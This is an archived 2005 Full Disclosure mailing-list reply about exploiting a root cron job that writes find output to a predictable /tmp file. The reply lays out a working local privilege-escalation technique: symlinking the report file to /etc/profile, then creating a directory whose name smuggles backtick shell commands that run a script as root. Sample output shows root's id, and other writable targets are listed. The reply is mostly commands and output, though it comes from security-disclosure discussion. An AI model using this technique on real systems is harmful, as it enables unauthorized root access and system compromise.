Full Disclosure mailing list archives

Re: Symlink attack techniques

From: H D Moore <fdlist () digitaloffense net>
Date: Wed, 14 Dec 2005 21:16:39 -0600

Assuming that the find command will report a directory or file that you control, 
you can use the symlink to overwrite a shell script, and then place shell commands
into your file name:

$ mkdir \`cd\..\;cd\ ..\;cd\ ..\;cd\ ..\;cd\ ..\;cd\ ..\;cd\ tmp\;sh\ root.sh\`
$ echo id > /tmp/root.sh
$ chmod +x /tmp/root.sh

$ ln -s /etc/profile /tmp/report

# find / [args]  > /tmp/report
# su - (executes /etc/profile)
/tmp/report: line 1: cd..: command not found
/tmp/report: line 1: ./uid=0(root): No such file or directory

Some potential shell scripts include /etc/profile, /etc/cron.*/*, and /etc/profiles.d/*.

-HD

On Wednesday 14 December 2005 16:42, Werner Schalk wrote:

On a Unix system there is a cronjob set up which will use the find
command to create some sort of report and output that report to a
predictable file in /tmp. So basically the command in the crontab is
something like:

15 4  * * 6     root    /usr/bin/find [command] > /tmp/report.txt

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Current thread:

Symlink attack techniques Werner Schalk (Dec 14)
- Re: Symlink attack techniques H D Moore (Dec 14)
  - Re: Symlink attack techniques Werner Schalk (Dec 15)
    - Re: Symlink attack techniques Joachim Schipper (Dec 15)
    - Re: Symlink attack techniques James Longstreet (Dec 15)
    - Re: Symlink attack techniques Valdis . Kletnieks (Dec 15)
    - Re: Symlink attack techniques Tim (Dec 15)